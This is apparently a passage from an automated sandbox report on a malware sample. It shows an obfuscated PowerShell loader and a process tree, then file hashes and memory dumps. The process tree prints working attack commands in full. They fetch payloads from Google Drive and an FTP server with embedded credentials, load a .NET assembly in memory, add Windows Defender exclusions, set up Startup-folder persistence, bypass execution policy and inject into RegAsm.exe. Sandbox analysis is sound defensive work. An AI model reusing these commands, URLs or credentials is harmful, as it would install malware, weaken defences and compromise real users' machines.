[char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'V' + [char]65 + 'By' + [char]65 + 'Eg' + [char]65 + 'VgB1' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'Ow' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQBt' + [char]65 + 'GE' + [char]65 + 'TgBy' + [char]65 + 'GU' + [char]65 + 'cwBV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'G0' + [char]65 + 'bgBv' + [char]65 + 'HI' + [char]65 + 'aQB2' + [char]65 + 'G4' + [char]65 + 'RQBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'HI' + [char]65 + 'ZQBz' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + '' + [char]65 + '6' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'HU' + [char]65 + 'cwBt' + [char]65 + 'C4' + [char]65 + 'bgBp' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + 'BV' + [char]65 + 'Fw' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cs' + [char]65 + 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'QgBL' + [char]65 + 'Ew' + [char]65 + 'UgBV' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gw' + [char]65 + 'aQBG' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bl' + [char]65 + 'GY' + [char]65 + 'eQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'Ow' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'JwB0' + [char]65 + 'E8' + [char]65 + 'T' + [char]65 + 'Bj' + [char]65 + 'F8' + [char]65 + 'SwBh' + [char]65 + 'DM' + [char]65 + 'WgBm' + [char]65 + 'G8' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'y' + [char]65 + 'Eo' + [char]65 + 'SgBy' + [char]65 + 'FY' + [char]65 + 'a' + [char]65 + 'Bt' + [char]65 + 'FY' + [char]65 + 'OQBj' + [char]65 + 'G0' + [char]65 + 'OQBY' + [char]65 + 'HM' + [char]65 + 'dQBY' + [char]65 + 'G0' + [char]65 + 'ag' + [char]65 + 'x' + [char]65 + 'Gc' + [char]65 + 'MQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Cg' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 + 'HE' + [char]65 + 'YQBG' + [char]65 + 'CQ' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65 + 'GU' + [char]65 + 'fQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'DI' + [char]65 + 'N' + [char]65 + 'B1' + [char]65 + 'Fg' + [char]65 + 'SgBU' + [char]65 + 'HE' + [char]65 + 'YQBt' + [char]65 + 'Gc' + [char]65 + 'eQBN' + [char]65 + 'HQ' + [char]65 + 'RgB6' + [char]65 + 'GE' + [char]65 + 'awBQ' + [char]65 + 'FI' + [char]65 + 'MQBx' + [char]65 + 'F8' + [char]65 + 'SQB2' + [char]65 + 'Ec' + [char]65 + 'aQBY' + [char]65 + 'E4' + [char]65 + 'Z' + [char]65 + 'Bx' + [char]65 + 'GE' + [char]65 + 'Tg' + [char]65 + 'x' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 + 'HE' + [char]65 + 'YQBG' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BJ' + [char]65 + 'G8' + [char]65 + 'cQBh' + [char]65 + 'EY' + [char]65 + 'J' + [char]65 + 'B7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'HI' + [char]65 + 'bQBF' + [char]65 + 'Hc' + [char]65 + 'ag' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'DQ' + [char]65 + 'Ng' + [char]65 + 'n' + [char]65 + 'Cg' + [char]65 + 'cwBu' + [char]65 + 'Gk' + [char]65 + 'YQB0' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'RQBS' + [char]65 + 'FU' + [char]65 + 'V' + [char]65 + 'BD' + [char]65 + 'EU' + [char]65 + 'V' + [char]65 + 'BJ' + [char]65 + 'Eg' + [char]65 + 'QwBS' + [char]65 + 'EE' + [char]65 + 'XwBS' + [char]65 + 'E8' + [char]65 + 'UwBT' + [char]65 + 'EU' + [char]65 + 'QwBP' + [char]65 + 'FI' + [char]65 + 'U' + [char]65 + '' + [char]65 + '6' + [char]65 + 'HY' + [char]65 + 'bgBl' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'cgBt' + [char]65 + 'EU' + [char]65 + 'dwBq' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'n' + [char]65 + 'D0' + [char]65 + 'Z' + [char]65 + 'Bp' + [char]65 + 'CY' + [char]65 + 'Z' + [char]65 + 'Bh' + [char]65 + 'G8' + [char]65 + 'b' + [char]65 + 'Bu' + [char]65 + 'Hc' + [char]65 + 'bwBk' + [char]65 + 'D0' + [char]65 + 'd' + [char]65 + 'By' + [char]65 + 'G8' + [char]65 + 'c' + [char]65 + 'B4' + [char]65 + 'GU' + [char]65 + 'PwBj' + [char]65 + 'HU' + [char]65 + 'LwBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'GU' + [char]65 + 'b' + [char]65 + 'Bn' + [char]65 + 'G8' + [char]65 + 'bwBn' + [char]65 + 'C4' + [char]65 + 'ZQB2' + [char]65 + 'Gk' + [char]65 + 'cgBk' + [char]65 + 'C8' + [char]65 + 'Lw' + [char]65 + '6' + [char]65 + 'HM' + [char]65 + 'c' + [char]65 + 'B0' + [char]65 + 'HQ' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65 + 'dQBz' + [char]65 + 'G0' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'dwBw' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'FQ' + [char]65 + 'cgBI' + [char]65 + 'FY' + [char]65 + 'dQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'ZQBk' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'V' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBo' + [char]65 + 'HQ' + [char]65 + 'YQBQ' + [char]65 + 'C4' + [char]65 + 'TwBJ' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 + 'B7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy' + [char]65 + 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'y' + [char]65 + 'Cg' + [char]65 + 'cwBs' + [char]65 + 'GE' + [char]65 + 'dQBx' + [char]65 + 'EU' + [char]65 + 'LgBy' + [char]65 + 'G8' + [char]65 + 'agBh' + [char]65 + 'E0' + [char]65 + 'LgBu' + [char]65 + 'G8' + [char]65 + 'aQBz' + [char]65 + 'HI' + [char]65 + 'ZQBW' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy' + [char]65 + 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Ow' + [char]65 + '=';$nvcbv = $qKKzc.replace('уЦϚ' , 'A') ;$acwwn = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nvcbv ) ); $acwwn = $acwwn[-1..-$acwwn.Length] -join '';$acwwn = $acwwn.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\SKMBT_77122012816310TD0128_17311_XLS.vbs');powershell $acwwn
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3368
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3448
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:64
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3472
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
          4⤵
            PID:1600
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4084
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\ugfiy.ps1"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3704
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:3024
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\SKMBT_77122012816310TD0128_17311_XLS.vbs"
            4⤵
              PID:3628

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\1210\logs.dat

        Filesize

        144B

        MD5

        888e5f7199a517e1d5b9853d786c0fcc

        SHA1

        e9b82e0ba295842add3db215addcb4ae7bb30276

        SHA256

        833099bbf11a51cabb144090f047933f8a6fe62e4127cf1c91daa55322bdecbf

        SHA512

        400e077767fc5a13edc4a2a9ab00bbaef1974d8d79294da89813187f6a9d62502a947a461414427a1cff3b62a0d53990a1a69875831f98744cc8317f91be417d

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\ugfiy.ps1

        Filesize

        1.7MB

        MD5

        e7c82fa422bc247b3af1f0c6a98a76a6

        SHA1

        48e038fe5710a3c71d70eaf756a15c1a9f0ed576

        SHA256

        5503e9420481271cbc5ba26f1b106cd2bb6e985cce64183ec17a06eb0c6dbc59

        SHA512

        5095bbe62cd54c4875393bd2398ff74b93048d81d94678f0407aa98eda99b63219db42685beb4791b6b735684f98b27f2dd507362352ef09cbe701440484aac1

      • C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

        Filesize

        336B

        MD5

        7069af5dfd0a63e0de202001555ed588

        SHA1

        c650649285c25a8847519ead0742f7c86af87850

        SHA256

        302da80c23d8b8c7c8437064f9d8b9d339604290d18e3765fd1be15caa6879b7

        SHA512

        057e060ef41a94b4b7a95f180e4eb6c9fed1f1149d1045fbfe5caec1ff5f40dd669de06e157682916df666999d2f28cf591695d86e6ca69a02b52f1faa7b9188

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        76692775e4781f0c9f0092f5804cfdb1

        SHA1

        6740e4e4110028c62282ee1e7eb8be576a2bc23a

        SHA256

        0c451ff3823450d544066237cbfb08556b7ca36c4a0ea085055f69ab35795b00

        SHA512

        6e0731e3736594d9e86da2fc33e08a663f29100074cc8d46e2716123c946b9eb150c804c7cf8428cac631e1cff984663d41ce3b5e1e77965bd8e2ecf0742af34

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        5f9f41519a0cde24a4e144b8c707bfe7

        SHA1

        771debfaa4a9235b8dcfa108c085e2c718d188fe

        SHA256

        19a06c243cc152a21b1fb96776a0804cba6c913a3602d802ed8661674321284e

        SHA512

        d43dce96622071991255bb569f399e3026ddcce4d1933f7d3f55cd6c627bfad086bbb8c5507febb5767f88e40a92bc2319620e5004350b567ece78bf579a816e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        217d9191dfd67252cef23229676c9eda

        SHA1

        80d940b01c28e3933b9d68b3e567adc2bac1289f

        SHA256

        e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

        SHA512

        86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sg4yrhyk.irr.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/3024-113-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-85-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-167-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-166-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-164-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-120-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-163-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-162-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-81-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-83-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-121-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-87-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-89-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-90-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-91-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-92-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-94-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-95-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-97-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-98-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-99-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-101-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-102-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-103-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-160-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-106-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-108-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-109-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-110-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-119-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-159-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-115-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-116-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-117-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-112-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-157-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-156-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-123-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-124-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-126-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-127-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-129-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-130-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-131-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-133-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-134-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-135-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-137-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-138-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-140-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-141-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-142-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-144-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-145-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-146-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-148-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-149-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-151-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-152-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-153-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3024-155-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/3368-59-0x00007FFF77D63000-0x00007FFF77D65000-memory.dmp

        Filesize

        8KB

      • memory/3368-11-0x00007FFF77D60000-0x00007FFF78821000-memory.dmp

        Filesize

        10.8MB

      • memory/3368-0-0x00007FFF77D63000-0x00007FFF77D65000-memory.dmp

        Filesize

        8KB

      • memory/3368-10-0x000002D57FE40000-0x000002D57FE62000-memory.dmp

        Filesize

        136KB

      • memory/3368-66-0x00007FFF77D60000-0x00007FFF78821000-memory.dmp

        Filesize

        10.8MB

      • memory/3368-60-0x00007FFF77D60000-0x00007FFF78821000-memory.dmp

        Filesize

        10.8MB

      • memory/3368-12-0x00007FFF77D60000-0x00007FFF78821000-memory.dmp

        Filesize

        10.8MB

      • memory/3448-22-0x0000015F9EEF0000-0x0000015F9EEFA000-memory.dmp

        Filesize

        40KB

      • memory/3704-80-0x00000149AA0A0000-0x00000149AA0AA000-memory.dmp

        Filesize

        40KB